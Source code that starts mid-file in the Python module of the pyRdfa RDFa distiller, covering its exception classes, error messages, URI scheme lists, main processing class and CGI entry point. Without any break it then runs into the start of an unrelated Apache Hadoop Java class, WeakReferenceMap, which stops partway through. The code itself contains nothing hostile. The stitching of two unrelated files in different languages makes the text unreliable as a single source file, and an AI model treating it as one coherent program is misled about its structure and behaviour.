    functionality is added to the Exception class."""
    def __init__(self, msg) :
        Exception.__init__(self)
        self.msg = msg
class FailedSource(RDFaError) :
    """Raised when the original source cannot be accessed; the optional HTTP
    status code is kept on ``http_code``. It does not add any new
    functionality to the Exception class."""
    def __init__(self, msg, http_code = None) :
        RDFaError.__init__(self, msg)
        self.http_code = http_code
class HTTPError(RDFaError) :
    """Raised when HTTP problems are detected; the status code is kept on
    ``http_code``. It does not add any new functionality to the Exception
    class."""
    def __init__(self, http_msg, http_code) :
        RDFaError.__init__(self, http_msg)
        self.http_code = http_code
class ProcessingError(RDFaError) :
    """Error found during processing. It does not add any new functionality to the
    Exception class."""
    # Marker subclass only: distinguishes processing-time errors from
    # source-access (FailedSource) and HTTP (HTTPError) failures.
    pass
class pyRdfaError(Exception) :
    """Superclass exceptions representing error conditions outside the RDFa 1.1 specification."""
    # Implementation-level failures raise this family rather than RDFaError.
    pass
# Error and Warning RDFS classes
# Terms from the W3C RDFa vocabulary used to type entries in the processor graph.
RDFA_Error = ns_rdfa["Error"]
RDFA_Warning = ns_rdfa["Warning"]
RDFA_Info = ns_rdfa["Information"]
NonConformantMarkup = ns_rdfa["DocumentError"]
UnresolvablePrefix = ns_rdfa["UnresolvedCURIE"]
# NOTE: both unresolvable prefixes and references map to the same vocabulary term.
UnresolvableReference = ns_rdfa["UnresolvedCURIE"]
UnresolvableTerm = ns_rdfa["UnresolvedTerm"]
VocabReferenceError = ns_rdfa["VocabReferenceError"]
PrefixRedefinitionWarning = ns_rdfa["PrefixRedefinition"]

# Distiller-specific (non-spec) error terms, in the distiller's own namespace.
FileReferenceError = ns_distill["FileReferenceError"]
HTError = ns_distill["HTTPError"]
IncorrectPrefixDefinition = ns_distill["IncorrectPrefixDefinition"]
IncorrectBlankNodeUsage = ns_distill["IncorrectBlankNodeUsage"]
IncorrectLiteral = ns_distill["IncorrectLiteral"]

# Error message texts; most are %-format templates filled in at report time.
err_no_blank_node = "Blank node in %s position is not allowed; ignored"
err_redefining_URI_as_prefix = "'%s' a registered or an otherwise used URI scheme, but is defined as a prefix here; is this a mistake? (see, eg, http://en.wikipedia.org/wiki/URI_scheme or http://www.iana.org/assignments/uri-schemes.html for further information for most of the URI schemes)"
err_xmlns_deprecated = "The usage of 'xmlns' for prefix definition is deprecated; please use the 'prefix' attribute instead (definition for '%s')"
err_bnode_local_prefix = "The '_' local CURIE prefix is reserved for blank nodes, and cannot be defined as a prefix"
err_col_local_prefix = "The character ':' is not valid in a CURIE Prefix, and cannot be used in a prefix definition (definition for '%s')"
err_missing_URI_prefix = "Missing URI in prefix declaration for '%s' (in '%s')"
err_invalid_prefix = "Invalid prefix declaration '%s' (in '%s')"
err_no_default_prefix = "Default prefix cannot be changed (in '%s')"
err_prefix_and_xmlns = "@prefix setting for '%s' overrides the 'xmlns:%s' setting; may be a source of problem if same file is run through RDFa 1.0"
err_non_ncname_prefix = "Non NCNAME '%s' in prefix definition (in '%s'); ignored"
err_absolute_reference = "CURIE Reference part contains an authority part: %s (in '%s'); ignored"
err_query_reference = "CURIE Reference query part contains an unauthorized character: %s (in '%s'); ignored"
err_fragment_reference = "CURIE Reference fragment part contains an unauthorized character: %s (in '%s'); ignored"
err_lang = "There is a problem with language setting; either both xml:lang and lang used on an element with different values, or, for (X)HTML5, only xml:lang is used."
err_URI_scheme = "Unusual URI scheme used in <%s>; may that be a mistake, e.g., resulting from using an undefined CURIE prefix or an incorrect CURIE?"
err_illegal_safe_CURIE = "Illegal safe CURIE: %s; ignored"
err_no_CURIE_in_safe_CURIE = "Safe CURIE is used, but the value does not correspond to a defined CURIE: [%s]; ignored"
err_undefined_terms = "'%s' is used as a term, but has not been defined as such; ignored"
err_non_legal_CURIE_ref = "Relative URI is not allowed in this position (or not a legal CURIE reference) '%s'; ignored"
err_undefined_CURIE = "Undefined CURIE: '%s'; ignored"
err_prefix_redefinition = "Prefix '%s' (defined in the initial RDFa context or in an ancestor) is redefined"
err_unusual_char_in_URI = "Unusual character in uri: %s; possible error?"
#############################################################################################
from .state import ExecutionContext
from .parse import parse_one_node
from .options import Options
from .transform import top_about, empty_safe_curie, vocab_for_role
from .utils import URIOpener
from .host import HostLanguage, MediaTypes, preferred_suffixes, content_to_host_language
# Environment variable used to characterize cache directories for RDFa vocabulary files.
CACHE_DIR_VAR = "PyRdfaCacheDir"
# current "official" version of RDFa that this package implements. This can be changed at the invocation of the package
rdfa_current_version = "1.1"
# I removed schemes that would not appear as a prefix anyway, like iris.beep
# http://en.wikipedia.org/wiki/URI_scheme seems to be a good source of information
# as well as http://www.iana.org/assignments/uri-schemes.html
# There are some overlaps here, but better more than not enough...
# These lists only feed the err_URI_scheme heuristic (warning on unknown schemes);
# they do not restrict processing.
# This comes from wikipedia
# NOTE(review): "rstp" below looks like a typo for "rtsp" — kept as-is to
# preserve current warning behavior; TODO confirm against upstream pyRdfa.
registered_iana_schemes = [
    "aaa","aaas","acap","cap","cid","crid","data","dav","dict","dns","fax","file", "ftp","geo","go",
    "gopher","h323","http","https","iax","icap","im","imap","info","ipp","iris","ldap", "lsid",
    "mailto","mid","modem","msrp","msrps", "mtqp", "mupdate","news","nfs","nntp","opaquelocktoken",
    "pop","pres", "prospero","rstp","rsync", "service","shttp","sieve","sip","sips", "sms", "snmp", "soap", "tag",
    "tel","telnet", "tftp", "thismessage","tn3270","tip","tv","urn","vemmi","wais","ws", "wss", "xmpp"
]
# This comes from wikipedia, too
unofficial_common = [
    "about", "adiumxtra", "aim", "apt", "afp", "aw", "bitcoin", "bolo", "callto", "chrome", "coap",
    "content", "cvs", "doi", "ed2k", "facetime", "feed", "finger", "fish", "git", "gg",
    "gizmoproject", "gtalk", "irc", "ircs", "irc6", "itms", "jar", "javascript",
    "keyparc", "lastfm", "ldaps", "magnet", "maps", "market", "message", "mms",
    "msnim", "mumble", "mvn", "notes", "palm", "paparazzi", "psync", "rmi",
    "secondlife", "sgn", "skype", "spotify", "ssh", "sftp", "smb", "soldat",
    "steam", "svn", "teamspeak", "things", "udb", "unreal", "ut2004",
    "ventrillo", "view-source", "webcal", "wtai", "wyciwyg", "xfire", "xri", "ymsgr"
]
# These come from the IANA page
historical_iana_schemes = [
    "fax", "mailserver", "modem", "pack", "prospero", "snews", "videotex", "wais"
]
provisional_iana_schemes = [
    "afs", "dtn", "dvb", "icon", "ipn", "jms", "oid", "rsync", "ni"
]
other_used_schemes = [
    "hdl", "isbn", "issn", "mstp", "rtmp", "rtspu", "stp"
]
# Union of all the lists above; membership test for the "unusual scheme" warning.
uri_schemes = registered_iana_schemes + unofficial_common + historical_iana_schemes + provisional_iana_schemes + other_used_schemes
# List of built-in transformers that are to be run regardless, because they are part of the RDFa spec
builtInTransformers = [
    empty_safe_curie, top_about, vocab_for_role
]
#########################################################################################################
#########################################################################################################
class pyRdfa :
    """Main processing class for the distiller.

    Typical usage is one of the externally used methods: L{graph_from_DOM},
    L{graph_from_source}, L{rdf_from_source}, or L{rdf_from_sources}.

    @ivar options: an instance of the L{Options} class
    @ivar media_type: the preferred default media type, possibly set at initialization
    @ivar base: the base value, possibly set at initialization
    @ivar http_status: HTTP Status, to be returned when the package is used via a CGI entry. Initially set to 200, may be modified by exception handlers
    """
    def __init__(self, options = None, base = "", media_type = "", rdfa_version = None) :
        """
        @keyword options: Options for the distiller
        @type options: L{Options}
        @keyword base: URI for the default "base" value (usually the URI of the file to be processed)
        @keyword media_type: explicit setting of the preferred media type (a.k.a. content type) of the RDFa source
        @keyword rdfa_version: the RDFa version that should be used. If not set, the value of the global L{rdfa_current_version} variable is used
        """
        self.http_status = 200
        self.base = base
        # An empty base means "derive the base later from the source itself"
        # (see _get_input, which fills required_base from the URL or file path).
        if base == "" :
            self.required_base = None
        else :
            self.required_base = base
        self.charset = None
        # predefined content type
        self.media_type = media_type
        if options == None :
            self.options = Options()
        else :
            self.options = options
        if media_type != "" :
            self.options.set_host_language(self.media_type)
        # None here means "autodetect per document"; may be overwritten during parsing.
        if rdfa_version is not None :
            self.rdfa_version = rdfa_version
        else :
            self.rdfa_version = None
    def _get_input(self, name) :
        """
        Trying to guess whether "name" is a URI or a string (for a file); it then tries to open this source accordingly,
        returning a file-like object. If name is none of these, it returns the input argument (that should
        be, supposedly, a file-like object already).
        If the media type has not been set explicitly at initialization of this instance,
        the method also sets the media_type based on the HTTP GET response or the suffix of the file. See
        L{host.preferred_suffixes} for the suffix to media type mapping.
        @param name: identifier of the input source
        @type name: string or a file-like object
        @return: a file like object if opening "name" is possible and successful, "name" otherwise
        @raise FailedSource: if the source cannot be opened
        """
        try :
            # Python 2 branch
            # NOTE(review): both branches are identical in this copy; the try/except
            # presumably guarded a Python 2 'basestring' check originally — confirm upstream.
            isstring = isinstance(name, str)
        except :
            # Python 3 branch
            isstring = isinstance(name, str)
        try :
            if isstring :
                # check if this is a URI, ie, if there is a valid 'scheme' part
                # otherwise it is considered to be a simple file
                if urlparse(name)[0] != "" :
                    url_request = URIOpener(name)
                    # the final location may differ from 'name' after redirects
                    self.base = url_request.location
                    if self.media_type == "" :
                        if url_request.content_type in content_to_host_language :
                            self.media_type = url_request.content_type
                        else :
                            self.media_type = MediaTypes.xml
                        self.options.set_host_language(self.media_type)
                    self.charset = url_request.charset
                    if self.required_base == None :
                        self.required_base = name
                    return url_request.data
                else :
                    # Creating a File URI for this thing
                    if self.required_base == None :
                        self.required_base = "file://" + os.path.join(os.getcwd(),name)
                    if self.media_type == "" :
                        self.media_type = MediaTypes.xml
                        # see if the default should be overwritten
                        for suffix in preferred_suffixes :
                            if name.endswith(suffix) :
                                self.media_type = preferred_suffixes[suffix]
                                self.charset = 'utf-8'
                                break
                        self.options.set_host_language(self.media_type)
                    return open(name, 'rb')
            else :
                # not a string: assume it is already a file-like object
                return name
        except HTTPError :
            # propagate HTTP errors untouched; callers map them to error triples
            raise sys.exc_info()[1]
        except :
            (type, value, traceback) = sys.exc_info()
            raise FailedSource(value)
    ####################################################################################################################
    # Externally used methods
    #
    def graph_from_DOM(self, dom, graph = None, pgraph = None) :
        """
        Extract the RDF Graph from a DOM tree. This is where the real processing happens. All other methods get down to this
        one, eventually (e.g., after opening a URI and parsing it into a DOM).
        @param dom: a DOM Node element, the top level entry node for the whole tree (i.e., the C{dom.documentElement} is used to initiate processing down the node hierarchy)
        @keyword graph: an RDF Graph (if None, than a new one is created)
        @type graph: rdflib Graph instance.
        @keyword pgraph: an RDF Graph to hold (possibly) the processor graph content. If None, and the error/warning triples are to be generated, they will be added to the returned graph. Otherwise they are stored in this graph.
        @type pgraph: rdflib Graph instance
        @return: an RDF Graph
        @rtype: rdflib Graph instance
        """
        def copyGraph(tog, fromg) :
            # copy both the triples and the namespace bindings
            for t in fromg :
                tog.add(t)
            for k,ns in fromg.namespaces() :
                tog.bind(k,ns)
        if graph == None :
            # Create the RDF Graph, that will contain the return triples...
            graph = Graph()
        # this will collect the content, the 'default graph', as called in the RDFa spec
        default_graph = Graph()
        # get the DOM tree
        topElement = dom.documentElement
        # Create the initial state. This takes care of things
        # like base, top level namespace settings, etc.
        state = ExecutionContext(topElement, default_graph, base=self.required_base if self.required_base != None else "", options=self.options, rdfa_version=self.rdfa_version)
        # Perform the built-in and external transformations on the HTML tree.
        logger.info(self.options)
        for trans in self.options.transformers + builtInTransformers :
            trans(topElement, self.options, state)
        # This may have changed if the state setting detected an explicit version information:
        self.rdfa_version = state.rdfa_version
        # The top level subject starts with the current document; this
        # is used by the recursion
        # this function is the real workhorse
        parse_one_node(topElement, default_graph, None, state, [])
        # Massage the output graph in term of rdfa:Pattern and rdfa:copy
        handle_prototypes(default_graph)
        # If the RDFS expansion has to be made, here is the place...
        if self.options.vocab_expansion :
            from .rdfs.process import process_rdfa_sem
            process_rdfa_sem(default_graph, self.options)
        # Experimental feature: nothing for now, this is kept as a placeholder
        if self.options.experimental_features :
            pass
        # What should be returned depends on the way the options have been set up
        if self.options.output_default_graph :
            copyGraph(graph, default_graph)
            if self.options.output_processor_graph :
                # processor triples go to pgraph if the caller supplied one,
                # otherwise they are merged into the returned graph
                if pgraph != None :
                    copyGraph(pgraph, self.options.processor_graph.graph)
                else :
                    copyGraph(graph, self.options.processor_graph.graph)
        elif self.options.output_processor_graph :
            if pgraph != None :
                copyGraph(pgraph, self.options.processor_graph.graph)
            else :
                copyGraph(graph, self.options.processor_graph.graph)
        # this is necessary if several DOM trees are handled in a row...
        self.options.reset_processor_graph()
        return graph
    def graph_from_source(self, name, graph = None, rdfOutput = False, pgraph = None) :
        """
        Extract an RDF graph from an RDFa source. The source is parsed, the RDF extracted, and the RDFa Graph is
        returned. This is a front-end to the L{pyRdfa.graph_from_DOM} method.
        @param name: a URI, a file name, or a file-like object
        @param graph: rdflib Graph instance. If None, a new one is created.
        @param pgraph: rdflib Graph instance for the processor graph. If None, and the error/warning triples are to be generated, they will be added to the returned graph. Otherwise they are stored in this graph.
        @param rdfOutput: whether runtime exceptions should be turned into RDF and returned as part of the processor graph
        @return: an RDF Graph
        @rtype: rdflib Graph instance
        """
        def copyErrors(tog, options) :
            # move the processor-graph triples (and bindings) into the target
            # graph(s), then reset the processor graph for the next run
            if tog == None :
                tog = Graph()
            if options.output_processor_graph :
                for t in options.processor_graph.graph :
                    tog.add(t)
                    if pgraph != None : pgraph.add(t)
                for k,ns in options.processor_graph.graph.namespaces() :
                    tog.bind(k,ns)
                    if pgraph != None : pgraph.bind(k,ns)
            options.reset_processor_graph()
            return tog
        # Separating this for a forward Python 3 compatibility
        try :
            # Python 2 branch
            # NOTE(review): identical branches — see _get_input; confirm upstream.
            isstring = isinstance(name, str)
        except :
            # Python 3 branch
            isstring = isinstance(name, str)
        try :
            # First, open the source... Possible HTTP errors are returned as error triples
            input = None
            try :
                input = self._get_input(name)
            except FailedSource :
                f = sys.exc_info()[1]
                self.http_status = 400
                if not rdfOutput : raise f
                err = self.options.add_error(f.msg, FileReferenceError, name)
                self.options.processor_graph.add_http_context(err, 400)
                return copyErrors(graph, self.options)
            except HTTPError :
                h = sys.exc_info()[1]
                self.http_status = h.http_code
                if not rdfOutput : raise h
                err = self.options.add_error("HTTP Error: %s (%s)" % (h.http_code,h.msg), HTError, name)
                self.options.processor_graph.add_http_context(err, h.http_code)
                return copyErrors(graph, self.options)
            except Exception :
                e = sys.exc_info()[1]
                self.http_status = 500
                # Something nasty happened:-(
                if not rdfOutput : raise e
                err = self.options.add_error(str(e), context = name)
                self.options.processor_graph.add_http_context(err, 500)
                return copyErrors(graph, self.options)
            dom = None
            try :
                msg = ""
                parser = None
                if self.options.host_language == HostLanguage.html5 :
                    import warnings
                    warnings.filterwarnings("ignore", category=DeprecationWarning)
                    import html5lib
                    parser = html5lib.HTMLParser(tree=html5lib.treebuilders.getTreeBuilder("dom"))
                    if self.charset :
                        # This means the HTTP header has provided a charset, or the
                        # file is a local file when we suppose it to be a utf-8
                        dom = parser.parse(input, encoding=self.charset)
                    else :
                        # No charset set. The HTMLLib parser tries to sniff into the
                        # the file to find a meta header for the charset; if that
                        # works, fine, otherwise it falls back on window-...
                        dom = parser.parse(input)
                    try :
                        # re-read the source to let adjust_html_version inspect it;
                        # a file-like object is simply rewound instead
                        if isstring :
                            input.close()
                            input = self._get_input(name)
                        else :
                            input.seek(0)
                        from .host import adjust_html_version
                        self.rdfa_version = adjust_html_version(input, self.rdfa_version)
                    except :
                        # if anyting goes wrong, it is not really important; rdfa version stays what it was...
                        pass
                else :
                    # in other cases an XML parser has to be used
                    from .host import adjust_xhtml_and_version
                    parse = xml.dom.minidom.parse
                    dom = parse(input)
                    (adjusted_host_language, version) = adjust_xhtml_and_version(dom, self.options.host_language, self.rdfa_version)
                    self.options.host_language = adjusted_host_language
                    self.rdfa_version = version
            except ImportError :
                msg = "HTML5 parser not available. Try installing html5lib <http://code.google.com/p/html5lib>"
                raise ImportError(msg)
            except Exception :
                e = sys.exc_info()[1]
                # These are various parsing exception. Per spec, this is a case when
                # error triples MUST be returned, ie, the usage of rdfOutput (which switches between an HTML formatted
                # return page or a graph with error triples) does not apply
                err = self.options.add_error(str(e), context = name)
                self.http_status = 400
                self.options.processor_graph.add_http_context(err, 400)
                return copyErrors(graph, self.options)
            # If we got here, we have a DOM tree to operate on...
            return self.graph_from_DOM(dom, graph, pgraph)
        except Exception :
            # Something nasty happened during the generation of the graph...
            (a,b,c) = sys.exc_info()
            sys.excepthook(a,b,c)
            if isinstance(b, ImportError) :
                self.http_status = None
            else :
                self.http_status = 500
            if not rdfOutput : raise b
            err = self.options.add_error(str(b), context = name)
            self.options.processor_graph.add_http_context(err, 500)
            return copyErrors(graph, self.options)
    def rdf_from_sources(self, names, outputFormat = "turtle", rdfOutput = False) :
        """
        Extract and RDF graph from a list of RDFa sources and serialize them in one graph. The sources are parsed, the RDF
        extracted, and serialization is done in the specified format.
        @param names: list of sources, each can be a URI, a file name, or a file-like object
        @keyword outputFormat: serialization format. Can be one of "turtle", "n3", "xml", "pretty-xml", "nt". "xml", "pretty-xml", "json" or "json-ld". "turtle" and "n3", "xml" and "pretty-xml", and "json" and "json-ld" are synonyms, respectively. Note that the JSON-LD serialization works with RDFLib 3.* only.
        @keyword rdfOutput: controls what happens in case an exception is raised. If the value is False, the caller is responsible handling it; otherwise a graph is returned with an error message included in the processor graph
        @type rdfOutput: boolean
        @return: a serialized RDF Graph
        @rtype: string
        """
        # This is better because it gives access to the various, non-standard serializations
        # If it does not work because the extra are not installed, fall back to the standard
        # rdlib distribution...
        try :
            from pyRdfaExtras import MyGraph
            graph = MyGraph()
        except :
            graph = Graph()
        # graph.bind("xsd", Namespace('http://www.w3.org/2001/XMLSchema#'))
        # the value of rdfOutput determines the reaction on exceptions...
        for name in names :
            self.graph_from_source(name, graph, rdfOutput)
        retval = graph.serialize(format=outputFormat)
        return retval
    def rdf_from_source(self, name, outputFormat = "turtle", rdfOutput = False) :
        """
        Extract and RDF graph from an RDFa source and serialize it in one graph. The source is parsed, the RDF
        extracted, and serialization is done in the specified format.
        @param name: a URI, a file name, or a file-like object
        @keyword outputFormat: serialization format. Can be one of "turtle", "n3", "xml", "pretty-xml", "nt". "xml", "pretty-xml", "json" or "json-ld". "turtle" and "n3", "xml" and "pretty-xml", and "json" and "json-ld" are synonyms, respectively. Note that the JSON-LD serialization works with RDFLib 3.* only.
        @keyword rdfOutput: controls what happens in case an exception is raised. If the value is False, the caller is responsible handling it; otherwise a graph is returned with an error message included in the processor graph
        @type rdfOutput: boolean
        @return: a serialized RDF Graph
        @rtype: string
        """
        # single-source convenience wrapper around rdf_from_sources
        return self.rdf_from_sources([name], outputFormat, rdfOutput)
################################################# CGI Entry point
################################################# CGI Entry point
def processURI(uri, outputFormat, form={}) :
    """The standard processing of an RDFa uri options in a form; used as an entry point from a CGI call.
    The call accepts extra form options (i.e., HTTP GET options) as follows:
    - C{graph=[output|processor|output,processor|processor,output]} specifying which graphs are returned. Default: C{output}
    - C{space_preserve=[true|false]} means that plain literals are normalized in terms of white spaces. Default: C{false}
    - C{rdfa_version} provides the RDFa version that should be used for distilling. The string should be of the form "1.0" or "1.1". Default is the highest version the current package implements, currently "1.1"
    - C{host_language=[xhtml,html,xml]} : the host language. Used when files are uploaded or text is added verbatim, otherwise the HTTP return header should be used. Default C{xml}
    - C{embedded_rdf=[true|false]} : whether embedded turtle or RDF/XML content should be added to the output graph. Default: C{false}
    - C{vocab_expansion=[true|false]} : whether the vocabularies should be expanded through the restricted RDFS entailment. Default: C{false}
    - C{vocab_cache=[true|false]} : whether vocab caching should be performed or whether it should be ignored and vocabulary files should be picked up every time. Default: C{false}
    - C{vocab_cache_report=[true|false]} : whether vocab caching details should be reported. Default: C{false}
    - C{vocab_cache_bypass=[true|false]} : whether vocab caches have to be regenerated every time. Default: C{false}
    - C{rdfa_lite=[true|false]} : whether warnings should be generated for non RDFa Lite attribute usage. Default: C{false}
    @param uri: URI to access. Note that the C{text:} and C{uploaded:} fake URI values are treated separately; the former is for textual input (in which case a StringIO is used to get the data) and the latter is for uploaded file, where the form gives access to the file directly.
    @param outputFormat: serialization format, as defined by the package. Currently "xml", "turtle", "nt", or "json". Default is "turtle", also used if any other string is given.
    @param form: extra call options (from the CGI call) to set up the local options
    @type form: cgi FieldStorage instance
    @return: serialized graph
    @rtype: string
    """
    # NOTE(review): the mutable default 'form={}' is only ever read here
    # (keys()/getfirst()); normally a cgi.FieldStorage is passed in, so the
    # shared-default pitfall does not bite — but worth cleaning up eventually.
    def _get_option(param, compare_value, default) :
        # accept both the new '_' and the legacy '-' spellings of an option name
        param_old = param.replace('_','-')
        if param in list(form.keys()) :
            val = form.getfirst(param).lower()
            return val == compare_value
        elif param_old in list(form.keys()) :
            # this is to ensure the old style parameters are still valid...
            # in the old days I used '-' in the parameters, the standard favours '_'
            val = form.getfirst(param_old).lower()
            return val == compare_value
        else :
            return default
    # decide where the input comes from: uploaded file, inline text, or a real URI
    if uri == "uploaded:" :
        input = form["uploaded"].file
        base = ""
    elif uri == "text:" :
        input = StringIO(form.getfirst("text"))
        base = ""
    else :
        input = uri
        base = uri
    if "rdfa_version" in list(form.keys()) :
        rdfa_version = form.getfirst("rdfa_version")
    else :
        rdfa_version = None
    # working through the possible options
    # Host language: HTML, XHTML, or XML
    # Note that these options should be used for the upload and inline version only in case of a form
    # for real uris the returned content type should be used
    if "host_language" in list(form.keys()) :
        if form.getfirst("host_language").lower() == "xhtml" :
            media_type = MediaTypes.xhtml
        elif form.getfirst("host_language").lower() == "html" :
            media_type = MediaTypes.html
        elif form.getfirst("host_language").lower() == "svg" :
            media_type = MediaTypes.svg
        elif form.getfirst("host_language").lower() == "atom" :
            media_type = MediaTypes.atom
        else :
            media_type = MediaTypes.xml
    else :
        media_type = ""
    transformers = []
    check_lite = "rdfa_lite" in list(form.keys()) and form.getfirst("rdfa_lite").lower() == "true"
    # The code below is left for backward compatibility only. In fact, these options are not exposed any more,
    # they are not really in use
    if "extras" in list(form.keys()) and form.getfirst("extras").lower() == "true" :
        from .transform.metaname import meta_transform
        from .transform.OpenID import OpenID_transform
        from .transform.DublinCore import DC_transform
        for t in [OpenID_transform, DC_transform, meta_transform] :
            transformers.append(t)
    else :
        if "extra-meta" in list(form.keys()) and form.getfirst("extra-meta").lower() == "true" :
            from .transform.metaname import meta_transform
            transformers.append(meta_transform)
        if "extra-openid" in list(form.keys()) and form.getfirst("extra-openid").lower() == "true" :
            from .transform.OpenID import OpenID_transform
            transformers.append(OpenID_transform)
        if "extra-dc" in list(form.keys()) and form.getfirst("extra-dc").lower() == "true" :
            from .transform.DublinCore import DC_transform
            transformers.append(DC_transform)
    output_default_graph = True
    output_processor_graph = False
    # Note that I use the 'graph' and the 'rdfagraph' form keys here. Reason is that
    # I used 'graph' in the previous versions, including the RDFa 1.0 processor,
    # so if I removed that altogether that would create backward incompatibilities
    # On the other hand, the RDFa 1.1 doc clearly refers to 'rdfagraph' as the standard
    # key.
    a = None
    if "graph" in list(form.keys()) :
        a = form.getfirst("graph").lower()
    elif "rdfagraph" in list(form.keys()) :
        a = form.getfirst("rdfagraph").lower()
    if a != None :
        if a == "processor" :
            output_default_graph = False
            output_processor_graph = True
        elif a == "processor,output" or a == "output,processor" :
            output_processor_graph = True
    embedded_rdf = _get_option( "embedded_rdf", "true", False)
    space_preserve = _get_option( "space_preserve", "true", True)
    vocab_cache = _get_option( "vocab_cache", "true", True)
    vocab_cache_report = _get_option( "vocab_cache_report", "true", False)
    refresh_vocab_cache = _get_option( "vocab_cache_refresh", "true", False)
    vocab_expansion = _get_option( "vocab_expansion", "true", False)
    # a cache report only makes sense if the processor graph is actually returned
    if vocab_cache_report : output_processor_graph = True
    options = Options(output_default_graph = output_default_graph,
                      output_processor_graph = output_processor_graph,
                      space_preserve = space_preserve,
                      transformers = transformers,
                      vocab_cache = vocab_cache,
                      vocab_cache_report = vocab_cache_report,
                      refresh_vocab_cache = refresh_vocab_cache,
                      vocab_expansion = vocab_expansion,
                      embedded_rdf = embedded_rdf,
                      check_lite = check_lite
                      )
    processor = pyRdfa(options = options, base = base, media_type = media_type, rdfa_version = rdfa_version)
    # Decide the output format; the issue is what should happen in case of a top level error like an inaccessibility of
    # the html source: should a graph be returned or an HTML page with an error message?
    # decide whether HTML or RDF should be sent.
    htmlOutput = False
    #if 'HTTP_ACCEPT' in os.environ :
    #	acc = os.environ['HTTP_ACCEPT']
    #	possibilities = ['text/html',
    #					 'application/rdf+xml',
    #					 'text/turtle; charset=utf-8',
    #					 'application/json',
    #					 'application/ld+json',
    #					 'text/rdf+n3']
    #
    #	# this nice module does content negotiation and returns the preferred format
    #	sg = acceptable_content_type(acc, possibilities)
    #	htmlOutput = (sg != None and sg[0] == content_type('text/html'))
    #	os.environ['rdfaerror'] = 'true'
    # This is really for testing purposes only, it is an unpublished flag to force RDF output no
    # matter what
    try :
        graph = processor.rdf_from_source(input, outputFormat, rdfOutput = ("forceRDFOutput" in list(form.keys())) or not htmlOutput)
        if outputFormat == "n3" :
            retval = 'Content-Type: text/rdf+n3; charset=utf-8\n'
        elif outputFormat == "nt" or outputFormat == "turtle" :
            retval = 'Content-Type: text/turtle; charset=utf-8\n'
        elif outputFormat == "json-ld" or outputFormat == "json" :
            retval = 'Content-Type: application/ld+json; charset=utf-8\n'
        else :
            retval = 'Content-Type: application/rdf+xml; charset=utf-8\n'
        retval += '\n'
        retval += graph
        return retval
    except HTTPError :
        # upstream HTTP failure: render a human-readable HTML error page
        (type,h,traceback) = sys.exc_info()
        import cgi
        retval = 'Content-type: text/html; charset=utf-8\nStatus: %s \n\n' % h.http_code
        retval += "<html>\n"
        retval += "<head>\n"
        retval += "<title>HTTP Error in distilling RDFa content</title>\n"
        retval += "</head><body>\n"
        retval += "<h1>HTTP Error in distilling RDFa content</h1>\n"
        retval += "<p>HTTP Error: %s (%s)</p>\n" % (h.http_code,h.msg)
        retval += "<p>On URI: <code>'%s'</code></p>\n" % cgi.escape(uri)
        retval +="</body>\n"
        retval +="</html>\n"
        return retval
    except :
        # This branch should occur only if an exception is really raised, ie, if it is not turned
        # into a graph value.
        (type,value,traceback) = sys.exc_info()
        # note: the 'import traceback' below deliberately rebinds the local
        # 'traceback' name from sys.exc_info() to the stdlib module
        import traceback, cgi
        retval = 'Content-type: text/html; charset=utf-8\nStatus: %s\n\n' % processor.http_status
        retval += "<html>\n"
        retval += "<head>\n"
        retval += "<title>Exception in RDFa processing</title>\n"
        retval += "</head><body>\n"
        retval += "<h1>Exception in distilling RDFa</h1>\n"
        retval += "<pre>\n"
        strio = StringIO()
        traceback.print_exc(file=strio)
        retval += strio.getvalue()
        retval +="</pre>\n"
        retval +="<pre>%s</pre>\n" % value
        retval +="<h1>Distiller request details</h1>\n"
        retval +="<dl>\n"
        if uri == "text:" and "text" in form and form["text"].value != None and len(form["text"].value.strip()) != 0 :
            retval +="<dt>Text input:</dt><dd>%s</dd>\n" % cgi.escape(form["text"].value).replace('\n','<br/>')
        elif uri == "uploaded:" :
            retval +="<dt>Uploaded file</dt>\n"
        else :
            retval +="<dt>URI received:</dt><dd><code>'%s'</code></dd>\n" % cgi.escape(uri)
        if "host_language" in list(form.keys()) :
            retval +="<dt>Media Type:</dt><dd>%s</dd>\n" % media_type
        if "graph" in list(form.keys()) :
            retval +="<dt>Requested graphs:</dt><dd>%s</dd>\n" % form.getfirst("graph").lower()
        else :
            retval +="<dt>Requested graphs:</dt><dd>default</dd>\n"
        retval +="<dt>Output serialization format:</dt><dd> %s</dd>\n" % outputFormat
        if "space_preserve" in form : retval +="<dt>Space preserve:</dt><dd> %s</dd>\n" % form["space_preserve"].value
        retval +="</dl>\n"
        retval +="</body>\n"
        retval +="</html>\n"
        return retval
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.hadoop.util;
import java.lang.ref.WeakReference;
import java.util.Iterator;
import java.util.Map;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.atomic.AtomicLong;
import java.util.function.Consumer;
import java.util.function.Function;
import javax.annotation.Nullable;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.hadoop.classification.InterfaceAudience;
import org.apache.hadoop.fs.store.LogExactlyOnce;
import static java.util.Objects.requireNonNull;
/**
* A map of keys type K to objects of type V which uses weak references,
 * so does not leak memory through long-lived references
* <i>at the expense of losing references when GC takes place.</i>.
*
 * This class is intended to be used instead of ThreadLocal storage when
 * references are to be cleaned up when the instance holding them is discarded.
* In this use case, the key is the Long key.
*
* Concurrency.
* The class assumes that map entries are rarely contended for when writing,
* and that not blocking other threads is more important than atomicity.
* - a ConcurrentHashMap is used to map keys to weak references, with
* all its guarantees.
* - there is no automatic pruning.
* - see {@link #create(Object)} for the concurrency semantics on entry creation.
*/
@InterfaceAudience.Private
public class WeakReferenceMap<K, V> {
private static final Logger LOG =
LoggerFactory.getLogger(WeakReferenceMap.class);
/**
* The reference map.
*/
private final Map<K, WeakReference<V>> map = new ConcurrentHashMap<>();
/**
* Supplier of new instances.
*/
private final Function<? super K, ? extends V> factory;
/**
* Nullable callback when a get on a key got a weak reference back.
* The assumption is that this is for logging/stats, which is why
* no attempt is made to use the call as a supplier of a new value.
*/
private final Consumer<? super K> referenceLost;
/**
* Counter of references lost.
*/
